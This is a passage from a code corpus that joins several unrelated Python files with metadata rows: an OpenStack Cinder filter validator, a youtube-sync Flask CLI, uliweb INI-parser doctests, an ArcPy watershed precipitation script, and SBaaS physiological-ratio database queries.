def get_time_comparsion_operators():
"""Get list of time comparsion operators.
This method returns list which contains the allowed comparsion operators.
"""
return ["gt", "gte", "eq", "neq", "lt", "lte"]
def convert_filter_attributes(filters, resource):
for key in filters.copy().keys():
if resource in ['volume', 'backup',
'snapshot'] and key in ATTRIBUTE_CONVERTERS.keys():
filters[ATTRIBUTE_CONVERTERS[key]] = filters[key]
filters.pop(key)
def reject_invalid_filters(context, filters, resource,
enable_like_filter=False):
invalid_filters = []
for key in filters.copy().keys():
try:
# Only ASCII characters can be valid filter keys,
# in PY2/3, the key can be either unicode or string.
if isinstance(key, str):
key.encode('ascii')
else:
key.decode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
raise webob.exc.HTTPBadRequest(
explanation=_('Filter keys can only contain '
'ASCII characters.'))
if context.is_admin and resource not in ['pool']:
# Allow all options except resource is pool
# pool API is only available for admin
return
# Check the configured filters against those passed in resource
configured_filters = get_enabled_resource_filters(resource)
if configured_filters:
configured_filters = configured_filters[resource]
else:
configured_filters = []
for key in filters.copy().keys():
if not enable_like_filter:
if key not in configured_filters:
invalid_filters.append(key)
else:
# If 'key~' is configured, both 'key' and 'key~' are valid.
if not (key in configured_filters or
"%s~" % key in configured_filters):
invalid_filters.append(key)
if invalid_filters:
if 'all_tenants' in invalid_filters:
# NOTE: this is a special case: the cinderclient always adds
# 'all_tenants', so we don't want to hold that against a non-admin
# user and we silently ignore it. See Bug #1917574.
invalid_filters.remove('all_tenants')
filters.pop('all_tenants')
if len(invalid_filters) == 0:
return
raise webob.exc.HTTPBadRequest(
explanation=_('Invalid filters %s are found in query '
'options.') % ','.join(invalid_filters))
def process_general_filtering(resource):
def wrapper(process_non_general_filtering):
def _decorator(*args, **kwargs):
req_version = kwargs.get('req_version')
filters = kwargs.get('filters')
context = kwargs.get('context')
if req_version.matches(mv.RESOURCE_FILTER):
support_like = False
if req_version.matches(mv.LIKE_FILTER):
support_like = True
reject_invalid_filters(context, filters,
resource, support_like)
convert_filter_attributes(filters, resource)
else:
process_non_general_filtering(*args, **kwargs)
return _decorator
return wrapper
| apache-2.0 | 7,122,518,029,842,833,000 | 37.903766 | 79 | 0.607658 | false | 4.29568 | true | false | false |
abhayagiri/youtube-sync | youtube_sync/commands.py | 1 | 2083 | import binascii
import click
import jinja2
import os
import shutil
from . import app, tasks
instance_path = os.path.join(os.path.dirname(app.root_path), 'instance')
local_cfg_path = os.path.join(instance_path, 'local.cfg')
local_cfg_template_path = os.path.join(instance_path, 'local.cfg.tmpl')
def secret(length):
return binascii.hexlify(os.urandom(length)).decode('utf-8')[:length]
@app.cli.command()
def worker():
"""Run celery worker."""
os.execvp('celery', ['celery', '--app=youtube_sync.celery', '--loglevel=info', 'worker'])
@app.cli.command()
@click.option('--force', is_flag=True)
@click.option('--dan-bin', type=click.Path(exists=True), help='Path to Dynamic Audio Normalizer bin')
@click.option('--remote-host', type=click.STRING, help='Destination server host')
@click.option('--remote-user', type=click.STRING, help='Destination server user')
@click.option('--remote-path', type=click.Path(), help='Destination server path')
def setup_local_cfg(force, dan_bin, remote_host, remote_user, remote_path):
"""Setup instance/local.cfg."""
if os.path.exists(local_cfg_path):
click.echo('Already exists: %s' % local_cfg_path)
if not force:
click.echo('Exiting...')
return
if remote_host and remote_user and remote_path:
remote = '%s@%s:%s' % (remote_user, remote_host, remote_path)
else:
remote = None
vars = {
'CSRF_SESSION_KEY': secret(64),
'SECRET_KEY': secret(64),
'ADMIN_PASSWORD': secret(8),
'DESTINATION_SERVER_PATH': remote,
'DYNAMIC_AUDIO_NORMALIZER_BIN': dan_bin,
}
template = jinja2.Template(open(local_cfg_template_path).read())
click.echo('Updating/creating: %s' % local_cfg_path)
open(local_cfg_path, 'w').write(template.render(vars) + '\n')
@app.cli.command()
def add_test_job():
"""Add a test job to the worker queue."""
youtube_id='pn7w-6leiJA'
click.echo('Adding job with youtube_id = %s' % youtube_id)
result = tasks.make_audio.delay(youtube_id)
click.echo('Added task: %s' % result)
| mit | -3,540,241,657,560,488,400 | 33.716667 | 101 | 0.655785 | false | 3.244548 | false | false | false |
limodou/uliweb | test/test_pyini.py | 1 | 14100 | #coding=utf8
from uliweb.utils.pyini import *
def test_sorteddict():
"""
>>> d = SortedDict()
>>> d
<SortedDict {}>
>>> d.name = 'limodou'
>>> d['class'] = 'py'
>>> d
<SortedDict {'class':'py', 'name':'limodou'}>
>>> d.keys()
['name', 'class']
>>> d.values()
['limodou', 'py']
>>> d['class']
'py'
>>> d.name
'limodou'
>>> d.get('name', 'default')
'limodou'
>>> d.get('other', 'default')
'default'
>>> 'name' in d
True
>>> 'other' in d
False
>>> print d.other
None
>>> try:
... d['other']
... except Exception, e:
... print e
'other'
>>> del d['class']
>>> del d['name']
>>> d
<SortedDict {}>
>>> d['name'] = 'limodou'
>>> d.pop('other', 'default')
'default'
>>> d.pop('name')
'limodou'
>>> d
<SortedDict {}>
>>> d.update({'class':'py', 'attribute':'border'})
>>> d
<SortedDict {'attribute':'border', 'class':'py'}>
"""
def test_section():
"""
>>> s = Section('default', "#comment")
>>> print s
#comment
[default]
<BLANKLINE>
>>> s.name = 'limodou'
>>> s.add_comment('name', '#name')
>>> s.add_comment(comments='#change')
>>> print s
#change
[default]
#name
name = 'limodou'
<BLANKLINE>
>>> del s.name
>>> print s
#change
[default]
<BLANKLINE>
"""
def test_ini1():
"""
>>> x = Ini()
>>> s = x.add('default')
>>> print x
#coding=utf-8
[default]
<BLANKLINE>
>>> s['abc'] = 'name'
>>> print x
#coding=utf-8
[default]
abc = 'name'
<BLANKLINE>
"""
def test_ini2():
"""
>>> x = Ini()
>>> x['default'] = Section('default', "#comment")
>>> x.default.name = 'limodou'
>>> x.default['class'] = 'py'
>>> x.default.list = ['abc']
>>> print x
#coding=utf-8
#comment
[default]
name = 'limodou'
class = 'py'
list = ['abc']
<BLANKLINE>
>>> x.default.list = ['cde'] #for mutable object will merge the data, including dict type
>>> print x.default.list
['abc', 'cde']
>>> x.default.d = {'a':'a'}
>>> x.default.d = {'b':'b'}
>>> print x.default.d
{'a': 'a', 'b': 'b'}
"""
def test_gettext():
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = Ini(env={'_':_})
>>> x['default'] = Section('default')
>>> x.default.option = _('Hello')
>>> x.keys()
['set', '_', 'gettext_lazy', 'default']
"""
def test_replace():
"""
>>> x = Ini()
>>> x['default'] = Section('default')
>>> x.default.option = ['a']
>>> x.default.option
['a']
>>> x.default.option = ['b']
>>> x.default.option
['a', 'b']
>>> x.default.add('option', ['c'], replace=True)
>>> x.default.option
['c']
>>> print x.default
[default]
option <= ['c']
<BLANKLINE>
"""
def test_set_var():
"""
>>> x = Ini()
>>> x.set_var('default/key', 'name')
True
>>> print x
#coding=utf-8
[default]
key = 'name'
<BLANKLINE>
>>> x.set_var('default/key/name', 'hello')
True
>>> print x
#coding=utf-8
[default]
key = 'name'
key/name = 'hello'
<BLANKLINE>
>>> x.get_var('default/key')
'name'
>>> x.get_var('default/no')
>>> x.get_var('defaut/no', 'no')
'no'
>>> x.del_var('default/key')
True
>>> print x
#coding=utf-8
[default]
key/name = 'hello'
<BLANKLINE>
>>> x.get_var('default/key/name')
'hello'
>>> x.get_var('default')
<Section {'key/name':'hello'}>
"""
def test_update():
"""
>>> x = Ini()
>>> x.set_var('default/key', 'name')
True
>>> d = {'default/key':'limodou', 'default/b':123}
>>> x.update(d)
>>> print x
#coding=utf-8
[default]
key = 'limodou'
b = 123
<BLANKLINE>
"""
def test_uni_print():
"""
>>> a = ()
>>> uni_prt(a, 'utf-8')
'()'
>>> a = (1,2)
>>> uni_prt(a)
'(1, 2)'
"""
def test_triple_string():
"""
>>> from StringIO import StringIO
>>> buf = StringIO(\"\"\"
... #coding=utf8
... [DEFAULT]
... a = u'''hello
... 中文
... '''
... \"\"\")
>>> x = Ini()
>>> x.read(buf)
>>> print repr(x.DEFAULT.a)
u'hello\\n\\u4e2d\\u6587\\n'
"""
def test_save():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor)
>>> buf = StringIO(\"\"\"
... [default]
... option = _('English')
... str = 'str'
... str1 = "str"
... float = 1.2
... int = 1
... list = [1, 'str', 0.12]
... dict = {'a':'b', 1:2}
... s = u'English'
... [other]
... option = 'default'
... options1 = '{{option}} xxx'
... options2 = '{{default.int}}'
... options3 = option
... options4 = '-- {{default.option}} --'
... options5 = '-- {{default.s}} --'
... options6 = u'English {{default.s}} --'
... options7 = default.str + default.str1
... \"\"\")
>>> x.read(buf)
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
option = _('English')
str = 'str'
str1 = 'str'
float = 1.2
int = 1
list = [1, 'str', 0.12]
dict = {'a': 'b', 1: 2}
s = u'English'
[other]
option = 'default'
options1 = 'default xxx'
options2 = '1'
options3 = 'default'
options4 = '-- English --'
options5 = '-- English --'
options6 = u'English English --'
options7 = 'strstr'
<BLANKLINE>
"""
def test_merge_data():
"""
>>> from uliweb.utils.pyini import merge_data
>>> a = [[1,2,3], [2,3,4], [4,5]]
>>> b = [{'a':[1,2], 'b':{'a':[1,2]}}, {'a':[2,3], 'b':{'a':['b'], 'b':2}}]
>>> c = [set([1,2,3]), set([2,4])]
>>> print merge_data(a)
[1, 2, 3, 4, 5]
>>> print merge_data(b)
{'a': [1, 2, 3], 'b': {'a': [1, 2, 'b'], 'b': 2}}
>>> print merge_data(c)
set([1, 2, 3, 4])
>>> print merge_data([2])
2
"""
def test_lazy():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor, lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... option = _('English')
... str = 'str'
... str1 = "str"
... float = 1.2
... int = 1
... list = [1, 'str', 0.12]
... dict = {'a':'b', 1:2}
... s = u'English'
... [other]
... option = 'default'
... options1 = '{{option}} xxx'
... options2 = '{{default.int}}'
... options3 = option
... options4 = '-- {{default.option}} --'
... options5 = '-- {{default.s}} --'
... options6 = u'English {{default.s}} --'
... options7 = default.str + default.str1
... \"\"\")
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
option = _('English')
str = 'str'
str1 = 'str'
float = 1.2
int = 1
list = [1, 'str', 0.12]
dict = {'a': 'b', 1: 2}
s = u'English'
[other]
option = 'default'
options1 = 'default xxx'
options2 = '1'
options3 = 'default'
options4 = '-- English --'
options5 = '-- English --'
options6 = u'English English --'
options7 = 'strstr'
<BLANKLINE>
"""
def test_multiple_read():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor, lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... option = 'abc'
... [other]
... option = default.option
... option1 = '{{option}} xxx'
... option2 = '{{default.option}}'
... option3 = '{{other.option}}'
... \"\"\")
>>> x.read(buf)
>>> buf1 = StringIO(\"\"\"
... [default]
... option = 'hello'
... \"\"\")
>>> x.read(buf1)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
option = 'hello'
[other]
option = 'hello'
option1 = 'hello xxx'
option2 = 'hello'
option3 = 'hello'
<BLANKLINE>
"""
def test_chinese():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor)
>>> buf = StringIO(\"\"\"#coding=utf-8
... [default]
... option = '中文'
... option1 = u'中文'
... option2 = _('中文')
... option3 = '{{option}}'
... [other]
... x = '中文 {{default.option}}'
... x1 = u'中文 {{default.option}}'
... x2 = u'xbd {{default.option}}'
... \"\"\")
>>> x.read(buf)
>>> print x
#coding=utf-8
[default]
option = '\xe4\xb8\xad\xe6\x96\x87'
option1 = u'\xe4\xb8\xad\xe6\x96\x87'
option2 = _('\xe4\xb8\xad\xe6\x96\x87')
option3 = '\xe4\xb8\xad\xe6\x96\x87'
[other]
x = '\xe4\xb8\xad\xe6\x96\x87 \xe4\xb8\xad\xe6\x96\x87'
x1 = u'\xe4\xb8\xad\xe6\x96\x87 \xe4\xb8\xad\xe6\x96\x87'
x2 = u'xbd \xe4\xb8\xad\xe6\x96\x87'
<BLANKLINE>
>>> print repr(x.other.x1)
u'\u4e2d\u6587 \u4e2d\u6587'
>>> x.keys()
['set', '_', 'gettext_lazy', 'default', 'other']
"""
def test_set():
"""
>>> from StringIO import StringIO
>>> x = Ini()
>>> buf = StringIO(\"\"\"#coding=utf-8
... [default]
... set1 = {1,2,3}
... set2 = set([1,2,3])
... \"\"\")
>>> x.read(buf)
>>> print x
#coding=utf-8
[default]
set1 = set([1, 2, 3])
set2 = set([1, 2, 3])
<BLANKLINE>
>>> buf2 = StringIO(\"\"\"#coding=utf-8
... [default]
... set1 = {5,3}
... \"\"\")
>>> x.read(buf2)
>>> print x.default.set1
set([1, 2, 3, 5])
"""
def test_triple_string():
"""
>>> from StringIO import StringIO
>>> buf = StringIO(\"\"\"
... #coding=utf8
... [DEFAULT]
... a = 'b'
... \"\"\")
>>> x = Ini(raw=True)
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> print x.DEFAULT
<BLANKLINE>
#coding=utf8
test.ini :0003 [DEFAULT]
test.ini :0004 a = 'b'
<BLANKLINE>
"""
def test_var_in_section():
"""
>>> from StringIO import StringIO
>>> buf = StringIO(\"\"\"
... #coding=utf8
... [DEFAULT]
... MENUS2012 = [
... ('about', _('关于大会'), '/2012/about'),
... ('schedulebj', _('北京日程'), '/2012/schedulebj'),
... ('schedulesh', _('上海日程'), '/2012/schedulesh'),
... ('Hackathon', _('编程马拉松'), 'http://www.douban.com/event/17299206/'),
... ('registration', _('报名'), '/2012/registration'),
... ('volunteer', _('志愿'), '/2012/volunteer'),
... ('sponsors', _('赞助'), '/2012/sponsors'),
... ('Weibo', _('微博'), 'http://weibo.com/pyconcn'),
... ('2011', _('2011'), '/2011'),
... ]
... a = [1,2,3]
... b <= MENUS2012
... \"\"\")
>>> x = Ini()
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> print x.DEFAULT.b[0][0]
about
"""
def test_env_var_1():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> os.environ['TEST'] = 'test'
>>> os.environ['OK'] = '3'
>>> x = Ini(lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... a = '$TEST/ok'
... c = '${TEST}ok'
... b = $OK
... d = {'name_$TEST':'$OK'}
... \"\"\")
>>> x = Ini()
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print repr(x.default.a)
'test/ok'
>>> print repr(x.default.b)
3
>>> print repr(x.default.c)
'testok'
>>> print repr(x.default.d)
{'name_test': '3'}
>>> x = Ini()
>>> buf = StringIO(\"\"\"
... [default]
... a = '$TEST/ok'
... c = '${TEST}ok'
... b = $OK
... \"\"\")
>>> x = Ini()
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> print repr(x.default.a)
'test/ok'
>>> print repr(x.default.b)
3
>>> print repr(x.default.c)
'testok'
"""
def test_env_var_2():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> os.environ['TEST'] = 'test'
>>> os.environ['OK'] = '3'
>>> x = Ini(lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... a = '$TEST/ok'
... c = '${TEST}ok'
... \"\"\")
>>> x = Ini(import_env=False)
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
a = '$TEST/ok'
c = '${TEST}ok'
<BLANKLINE>
"""
def test_email():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> os.environ['MAIL'] = 'test'
>>> x = Ini(import_env=True, lazy=True)
>>> buf = StringIO(\"\"\"
... [MAIL]
... host = '128.192.168.2'
... \"\"\")
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[MAIL]
host = '128.192.168.2'
<BLANKLINE>
"""
def test_pre_var():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> x = Ini(import_env=True, lazy=True, pre_variables={'appname':'test'})
>>> buf = StringIO(\"\"\"
... [DEFAULT]
... model = '#{appname}.models.Model'
... \"\"\")
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[DEFAULT]
model = 'test.models.Model'
<BLANKLINE>
"""
def test_dict_init():
"""
>>> x = Ini({'default':{'abc':'name'}})
>>> print x
#coding=utf-8
[default]
abc = 'name'
<BLANKLINE>
"""
| bsd-2-clause | 8,745,944,110,796,426,000 | 22.260365 | 93 | 0.45872 | false | 2.955954 | true | false | false |
NMTHydro/Recharge | zobs/orecharge/Gauges/HF_precip_one.py | 1 | 5870 | import datetime
from dateutil import rrule
import arcpy, os
from arcpy import env
import numpy as np
# Set workspace to GIS gauge data location, loop through individual watersheds
arcpy.env.workspace = "C:\\Recharge_GIS\\nm_gauges.gdb"
fc = "nm_wtrs_11DEC15"
field = "USGS_Code"
cursor = arcpy.SearchCursor(fc)
# List csv gauge data, create list of gauge codes
folder = 'C:\\Users\David\\Documents\\Recharge\\Gauges\\Gauge_Data_HF_csv'
os.chdir(folder)
csvList = os.listdir(folder)
# make sure that this is getting the right string from the file name
files = [int(name[:8]) for name in csvList]
# Create layer from polygon feature class so it is selectable by attribute
arcpy.env.workspace = "C:\\Recharge_GIS\\nm_gauges.gdb"
arcpy.MakeFeatureLayer_management("C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15", "wtr_layer")
# Loop through polygon features in watersheds layer, select polygon geometry by attribute
for row in cursor:
gPoly = row.getValue(field)
polyStr = str(gPoly)
print gPoly
gstr = arcpy.AddFieldDelimiters("C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15", field)
sqlExp = gstr + " = " + polyStr
print sqlExp
geo = arcpy.SelectLayerByAttribute_management("wtr_layer", "NEW_SELECTION", sqlExp)
# Get csv data from gauges and identify time interval of needed precip data
if int(polyStr) in files:
print "true"
folder = 'C:\\Users\David\\Documents\\Recharge\\Gauges\\Gauge_Data_HF_csv'
os.chdir(folder)
pos = files.index(int(gPoly))
recs = []
fid = open(csvList[pos])
lines = fid.readlines()[0:]
fid.close()
rows = [line.split(',') for line in lines]
for line in rows:
recs.append([datetime.datetime.strptime(line[2], '%m/%d/%Y %H:%M'), # date
float(line[6])]) # discharge
print "Data points: " + str(len(recs))
qRecs = np.array(recs)
# Make start and end dates correspond with available PRISM data (i.e., 1984-01-01 to 2013-12-31)
start = qRecs[0, 0]
beginPrecip = datetime.datetime(1984, 1, 1)
if start < beginPrecip:
start = beginPrecip
print "Data start: " + str(start)
end = qRecs[len(qRecs)-1, 0]
endPrecip = datetime.datetime(2013, 12, 31)
if end > endPrecip:
end = endPrecip
print "Data end: " + str(end)
# Loop through raster data, clipping and creating arrays of data: Date Q Ppt
rasSq = 1013.02**2/1000 # ppt [mm -> m] and cellsize (x*y) [m*m]
precip = []
date = []
q = []
for day in rrule.rrule(rrule.DAILY, dtstart=start, until=end):
folder = "C:\\Recharge_GIS\\Precip\\800m\\Daily\\"
yr = day.year
if yr <= 1991:
arcpy.env.overwriteOutput = True # Ensure overwrite capability
arcpy.env.workspace = folder + str(day.year) + "a"
ras = folder + str(day.year) + "a\\" + "PRISM_NM_" + str(day.year) + day.strftime('%m') + day.strftime('%d') + ".tif"
if arcpy.Exists(ras):
try:
arcpy.CheckOutExtension("Spatial")
mask = "C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15"
rasPart = arcpy.sa.ExtractByMask(ras, geo)
if day == beginPrecip:
rasPart.save(folder + str(day.year) + "a\\" + str(gPoly) + "_rasterClipTest.tif")
arr = arcpy.RasterToNumPyArray(rasPart, nodata_to_value=0)
arrVal = np.multiply(arr, rasSq)
arrSum = arrVal.sum()
print "Sum of precip on " + str(day) + ": " + str(arrSum)
precip.append(arrSum)
date.append(day)
except:
pass
if yr > 1991:
arcpy.env.workspace = folder + str(day.year)
ras = folder + str(day.year) + "\\" + "PRISM_NMHW2Buff_" + str(day.year) + day.strftime('%m') + day.strftime('%d') + ".tif"
if arcpy.Exists(ras):
try:
arcpy.CheckOutExtension("Spatial")
mask = "C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15"
rasPart = arcpy.sa.ExtractByMask(ras, geo)
if day == beginPrecip:
rasPart.save(folder + str(day.year) + str(gPoly) + "_rasterClipTest.tif")
arr = arcpy.RasterToNumPyArray(rasPart, nodata_to_value=0)
arrVal = np.multiply(arr, rasSq)
arrSum = arrVal.sum()
print "Sum of precip on " + str(day) + ": " + str(arrSum)
precip.append(arrSum)
date.append(day)
except:
pass
ppt = np.array(precip, dtype=float)
date = [rec.strftime('%Y/%m/%d') for rec in date]
add_precip = []
for rec in qRecs[:, 0]:
dday = rec.strftime('%Y/%m/%d')
try:
if rec.hour == 17 and rec.minute == 00:
pos = date.index(dday)
ppt_apnd = ppt[pos]
add_precip.append(ppt_apnd)
else:
add_precip.append(0.0)
except:
pass
ppt_arr = np.array(add_precip, dtype=float)
data = np.column_stack((qRecs[:, 0], qRecs[:, 1], ppt_arr))
# print data
np.savetxt(('C:\\Users\David\\Documents\\Recharge\\Gauges\\Gauge_ppt_HF_csv\\' + str(gPoly) + "_date_q_ppt.csv"),
data, fmt=['%s', '%1.3f', '%1.3f'], delimiter=',')
print "You have been saved!"
| apache-2.0 | 2,281,321,173,935,287,000 | 39.482759 | 139 | 0.53356 | false | 3.48368 | false | false | false |
dmccloskey/SBaaS_quantification | SBaaS_quantification/stage01_quantification_physiologicalRatios_query.py | 1 | 30898 | #lims
from SBaaS_LIMS.lims_experiment_postgresql_models import *
from SBaaS_LIMS.lims_sample_postgresql_models import *
from .stage01_quantification_physiologicalRatios_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_quantification_physiologicalRatios_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for
'''
tables_supported = {'data_stage01_quantification_physiologicalRatios_averages':data_stage01_quantification_physiologicalRatios_averages,
'data_stage01_quantification_physiologicalRatios_replicates':data_stage01_quantification_physiologicalRatios_replicates,
};
self.set_supportedTables(tables_supported);
# Query sample names from data_stage01_quantification_physiologicalRatios_replicates
def get_sampleNameAbbreviations_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,exp_type_I=4):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(sample_description.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
sample_description.sample_name_abbreviation).order_by(
sample_description.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameShort_experimentIDAndSampleNameAbbreviationAndRatioIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,physiologicalratio_id_I,time_point_I,exp_type_I=4):
'''Querry sample names that are used from the experiment by sample name abbreviation and sample description'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).order_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.asc()).all();
sample_names_short_O = [];
for sn in sample_names: sample_names_short_O.append(sn.sample_name_short);
return sample_names_short_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_replicates
def get_timePoint_experimentIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,exp_type_I=4):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
sample_description.sample_name_short.like(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short),
sample_description.time_point.like(data_stage01_quantification_physiologicalRatios_replicates.time_point),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentIDAndRatioID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,physiologicalratio_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_replicates
def get_ratio_experimentIDAndSampleNameShortAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I, physiologicalratio_id_I):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
ratio_O = data[0][0];
else:
ratio_O = None;
return ratio_O;
except SQLAlchemyError as e:
print(e);
def get_ratios_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
